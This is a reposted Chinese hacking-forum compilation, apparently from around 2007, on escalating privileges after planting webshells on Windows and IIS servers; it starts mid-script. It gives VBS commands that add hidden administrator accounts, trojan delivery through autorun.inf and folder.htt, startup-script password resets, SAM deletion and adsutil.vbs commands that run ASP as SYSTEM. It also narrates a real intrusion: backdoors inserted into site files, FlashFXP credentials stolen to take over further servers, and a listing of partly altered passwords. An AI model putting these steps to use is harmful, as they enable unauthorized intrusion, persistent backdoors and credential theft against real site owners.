[转帖]如何提高提权效率

"net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
        但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序，还要一个木马程序，但是语句就和最后两句一样，通过cmd执行木马程序

三folder.htt与desktop.ini

        将改写的folder.htt与desktop.ini，还有你的木马或者是vbs或者是什么，放到对方管理员最可能浏览的目录下，觉得一个不够，可以多放几个
folder.htt添加代码

        但是后门和这两个文件必须要放到一块，有点问题，可以结合启动vbs，运行结束后，删除上传的后门.就是codebase="shell.vbs".shell写法如上

四replace

        替换法，可以替换正在执行的文件。用这个几乎可以马上得到权限，但是我没有做过试验，可以试下，将对方正在执行的文件替换为和它文件名一样的，捆绑了木马的。为什么不直接替换木马呢？如果替换的是关键程序，那不是就直接挂了？所以还是捆绑好点
格式
replace [drive1:][path1]filename [drive2:][path2] [/a] [/r] [/w]
replace [drive1:][path1]filename [drive2:][path2] [/r] [/w]

　[drive1:][path1]filename 指定源文件。
　[drive2:][path2] 指定要替换文件的
　　　　　　　　　　　　　 目录。
　/a 把新文件加入目标目录。不能和
　　　　　　　　　　　　　 /s 或 /u 命令行开关搭配使用。
　/p 替换文件或加入源文件之前会先提示您
　　　　　　　　　　　　　 进行确认。
　/r 替换只读文件以及未受保护的
　　　　　　　　　　　　　 文件。
　/s 替换目标目录中所有子目录的文件。
　　　　　　　　　　　　　 不能与 /a 命令选项
　　　　　　　　　　　　　 搭配使用。
　/w 等您插入磁盘以后再运行。
　/u 只会替换或更新比源文件日期早的文件。 不能与 /a 命令行开关搭配使用
这个命令没有试验过，看能不能替换不能访问的文件夹下的文件，大家可以试验下

五 脚本

编写一个启动/关机脚本配置文件scripts.ini，这个文件名是固定的，不能改变。内容如下：

[startup]
0cmdline=a.bat
0parameters=

将文件scripts.ini保存到"c:\winnt\system32\grouppolicy\machine\scripts"
a.bat的内容可以是net user yonghu mima
也可以是net user administrator xxx
这样可以恢复你想要得任意用户名的密码，也可以自己增加新的用户，但是要依赖重启，还有就是对system32有写的权限

六 sam

        如果可以访问对方的system32的话，删除对方的sam文件，等他重启以后就是admin用户密码为空
突然又有了想法，可以用replace命令替换的吗，可以把你的sam文件提取出来，上传到他的任意目录下，然后替换。不过不知道如果对system32没有权限访问的话，能不能实现替换。

      使用flashfxp来提升权限 最近各位一定得到不少肉鸡吧，从前段时间的动网的upfile漏洞， 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵，很少有人能作一口气完成。关键还是在提升权限上做个问题上，不少服务器设置的很bt，你的asp木马可能都用不了，还那里 来的提升啊。我们得到webshell也就是个低级别的用户的权限，各种提升权限方法是可谓五花八门啊，如何提升就看你自己的妙 招了。

其一，如果服务器上有装了pcanywhere服务端，管理员为了便于管理也给了我们方便，到系统盘的documents and settings/all users/application data/symantec/pcanywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。

其二，如果对方有serv-u大家不要骂我啊，通过修改servudaemon.ini和fpipe这软件提升权限应该是不成问 题吧。

其三，通过替换系统服务来提升。

其四，查找conn和config这类型的文件看能否得到sa或者mysql的相关密码，可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法，使用flashfxp也能提升权限，但是成功率高不高就看你自己的运气了

        本人www.xxx.com 通过bbs得到了一个webshell，放了个小马(现在海阳的名气太大了偶不敢放)，而且已经将一段代码插入了n个文件中，够 黑吧。提升权限没时间做。在我放假回家后，一看我晕bbs升级到动网sp2了我放的小马也被k了，人家的bbs是access版 本的。郁闷啊！突然想起我将一个页面插入了asp的后门，看看还有没有希望了。输www.xxx.com/xx.asp?id =1 好家伙，还在！高兴ing

于是上传了一个asp的脚本的后门，怎么提升权限呢?

        在这个网站的主机上游荡了n分钟，在c:\ program files下发现了flashfxp文件夹(跟我一样使用这个软件自己心里暗想)，于是就打了了sites. dat这个文件(编辑)这是什么东西密码和用户名，而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件会怎么样呢?
于是我就将sites.dat sites.dat.bak stats.dat stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了

         对方管理员通过flashfxp连接的各个站点都在图3，点击连接。通过了于是我们又有了一堆肉鸡，我们有ftp权限。上传脚本 木马~ 呵呵。

说了半天这提升权限的事情一点没讲啊
不要急，大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。可惜啊！
又想起了在sites.dat中也显示了密码和用户名，而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。

       怎么看? 菜鸟了吧 手头有个不错的查看星号的软件，就是xp星号密码查看器，通过查看跟sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码，还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息，按社会工程学的概念来说，没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。
我想这个问题应该反馈到flashfxp官方，让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户 名的sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法，至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。


将asp权限提到最高by: cnqing from:http://friend.91eb.com
        本来是要写个提权asp木马的，可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说，说的太麻烦没有必要。懂了就行。

原理：
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是iwan_name。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system 方法：

第一步。
得到inprocesslsapiapps内容，用命令"cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。

第二步
写一个bat内容为"cscript c:\inetpub\adminscripts\adsutil vbs set w3svc/inprpocessisapiapps "c:\inetpub\adminscripts\asp.dll" ·····
省略号为复制下的内容。中间用空格分开不要带回车符
最后运行这个bat就行了。
例如：
我用"cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\msw3prt.dll"
"c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_aut\author.dll"
"c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_adm\admin.dll"
"c:\program files\common files\microsoft shared\web server extensions\isapi\shtml.dll"

那么你的bat就应该是：

cscript c:\inetpub\adminscripts\adsutil vbs set w3svc/inprpocessisapiapps "c:\inetpub\adminscripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll" "c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_aut\author.dll" "c:\program files\common files\microsoft shared\web server extensions\isapi\_vti_adm\admin.dll" "c:\program files\common files\microsoft shared\web server extensions\isapi\shtml.dll"

已测试成功！！


其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```

反正代码是对的，但是很少能成功，具体的看运气了。。呵呵，下一步我想把他整合到海洋里面去。嘿嘿。

.network对象脚本权限提升漏洞利用工具


用户:

密码:


如何绕过防火墙提升权限

本文讲的重点是webshell权限的提升和绕过防火墙，高手勿笑。

废话少说，咱们进入正题。

        首先确定一下目标：http://www.sun***.com ，常见的虚拟主机。利用upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell，不是dvbbs，而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/index.asp是自由动力3.6文章系统。xr运用winhex.exe和wsockexpert.exe上传一个网页木马newmm.asp，用过动鲨的door.exe的人都知道，这个是上传asp木马内容的。于是，上传海洋2005a，成功获得webshell。

        测试一下权限，在cmd里运行set，获得主机一些信息，系统盘是d盘，也说明了我们的webshell有运行权限的。那我们看看c盘有什么呢？难道是双系统？浏览后发现没有什么系统文件，只有一些垃圾文件，晕死。没关系，再来检查一下，虚拟主机都有serv-u的，这台也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀，挖哈哈。

         

本贴已被 作者 于 2007年07月02日 10时06分12秒 编辑过